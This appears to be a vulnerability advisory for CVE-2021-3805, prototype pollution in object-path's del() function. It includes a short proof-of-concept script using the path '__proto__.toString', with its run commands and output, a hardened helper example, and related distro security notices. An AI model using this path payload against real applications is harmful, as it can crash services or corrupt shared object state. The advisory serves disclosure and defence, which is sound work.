Headline
CVE-2021-3805: Prototype Pollution in object-path
object-path is vulnerable to Improperly Controlled Modification of Object Prototype Attributes (‘Prototype Pollution’)
Description
The object-path package is vulnerable to Prototype Pollution. The del() function does not validate which object properties it deletes, so a path such as '__proto__.toString' resolves to Object.prototype instead of the target object. An attacker who controls the path can therefore modify the prototype of Object, removing default properties like toString from all objects.
Proof of Concept
Create the following PoC file:
// poc.js
const objectPath = require('object-path');
console.log("Before : " + ({}).toString());
objectPath.withInheritedProps.del({}, '__proto__.toString');
console.log("After : " + ({}).toString());
Execute the following commands in the terminal:
npm i object-path # Install affected module
node poc.js # Run the PoC
Check the Output:
Before : [object Object]
console.log("After : " + ({}).toString());
^
TypeError: {}.toString is not a function
Impact
Affected versions of this package are vulnerable to Denial of Service (DoS) via the del function.
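The missing validation described above, shown next to a hardened form. This is an added example, not object-path's own code: naiveDel and safeDel are hypothetical simplified path-delete helpers, and the demo runs against a constructed throwaway prototype instead of Object.prototype so the process stays usable.

```javascript
// Added example: simplified stand-ins, not object-path's actual source.
const BLOCKED = new Set(['__proto__', 'constructor', 'prototype']);

// Naive path delete: walks every segment with plain property access,
// so '__proto__' steps from the target object into its prototype.
function naiveDel(obj, path) {
  const keys = path.split('.');
  let cur = obj;
  for (const key of keys.slice(0, -1)) {
    if (cur == null) return obj;
    cur = cur[key];
  }
  if (cur != null) delete cur[keys[keys.length - 1]];
  return obj;
}

// Hardened path delete: rejects prototype-related segments and only
// descends through, and deletes, properties the object itself owns.
function safeDel(obj, path) {
  const keys = path.split('.');
  if (keys.some((k) => BLOCKED.has(k))) {
    throw new TypeError('refusing prototype-related path segment');
  }
  let cur = obj;
  for (const key of keys.slice(0, -1)) {
    if (cur === null || typeof cur !== 'object' ||
        !Object.prototype.hasOwnProperty.call(cur, key)) return obj;
    cur = cur[key];
  }
  const last = keys[keys.length - 1];
  if (cur !== null && typeof cur === 'object' &&
      Object.prototype.hasOwnProperty.call(cur, last)) delete cur[last];
  return obj;
}

// Constructed sandbox: a throwaway prototype stands in for Object.prototype
// so the demonstration does not damage the running process.
function demo() {
  const proto = { greet() { return 'hi'; } };
  const victim = Object.create(proto);
  naiveDel(victim, '__proto__.greet');
  const naiveRemoved = typeof proto.greet === 'undefined';
  const proto2 = { greet() { return 'hi'; } };
  const victim2 = Object.create(proto2);
  let rejected = false;
  try { safeDel(victim2, '__proto__.greet'); } catch (e) { rejected = e instanceof TypeError; }
  return { naiveRemoved, rejected, intact: typeof proto2.greet === 'function' };
}
console.log(demo());
```

The same segment check applies to any code that forwards untrusted strings as paths to a get, set or delete helper.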
Related news
Ubuntu Security Notice 5967-1 - It was discovered that the set method in object-path could be corrupted as a result of prototype pollution by sending a message to the parent process. An attacker could use this issue to cause object-path to crash.
Red Hat Advanced Cluster Management for Kubernetes 2.3.3 General Availability release images, which fix bugs, provide security fixes, and update container images. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE links in the References section. This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2021-3805: nodejs-object-path: prototype pollution vulnerability * CVE-2021-23017: nginx: Off-by-one in ngx_resolver_copy() when labels are followed by a pointer to a root domain name * CVE-2021-23434: object-path: Type confusion vulnerability can lead to a bypass of C...